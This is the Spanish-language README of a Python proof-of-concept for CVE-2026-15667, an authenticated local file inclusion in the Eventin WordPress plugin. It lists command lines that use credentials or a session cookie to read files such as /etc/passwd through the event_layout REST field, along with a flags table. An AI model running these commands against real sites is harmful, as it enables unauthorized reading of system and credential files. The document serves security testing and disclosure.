
Prueba de concepto en Python para CVE-2026-15667, una inclusión de archivos locales autenticada en el plugin Eventin de WordPress a través del campo REST event_layout.
CVE-2026-15667 WordPress Event Solution LFI POC
Eventin (plugin de WordPress wp-event-solution) ≤ 4.1.22 — inclusión de archivos locales autenticada (Contributor+) a través del campo REST event_layout.
Solo para pruebas autorizadas. No ejecutes esto contra sistemas que no sean de tu propiedad o para los que no tengas permiso de prueba.
Requiere: Python 3, solo biblioteca estándar.
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --test --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --uname USER --password PASS
python3 cve-2026-15667-eventin-lfi.py -u http://TARGET --file /etc/passwd --session 'wordpress_logged_in_HASH=...'
| Flag | Qué hace |
|---|
-u / --url | Raíz del sitio WordPress (obligatorio). http:// o https://; un nombre de host se prueba primero como HTTPS, luego HTTP. El TLS autofirmado se reintenta automáticamente. |
--test | Invitado: versión del plugin + ruta REST. Con autenticación: envía un traversal por POST e informa si se almacenó |
--file PATH | Incluye PATH a través del LFI e imprime la salida. Requiere autenticación |
--uname | Nombre de usuario de WordPress (Contributor+) |
--password | Contraseña de WordPress |
--session | Cabecera Cookie del navegador (o wordpress_logged_in_*=...). Omite /wp-login.php |
--uname/--password y --session son intercambiables. Necesitas un par o la cookie para --file y para la mitad autenticada de --test.
--test sin credenciales no está autenticado (readme + /wp-json/eventin/v2/events). La inclusión en sí no lo está.
El plugin incluye {layout}.php, por lo que --file /etc/passwd solicita /etc/passwd.php. Pasa una ruta .php, o una ruta que exista después de que se añada .php.
Stdout: VERSION, ROUTE, PRESENT, NEED_AUTH, VULNERABLE, NOT_VULNERABLE, AUTH_FAILED, contenido del archivo.
CVE: CVE-2026-15667. Reportado por Wordfence PRISM.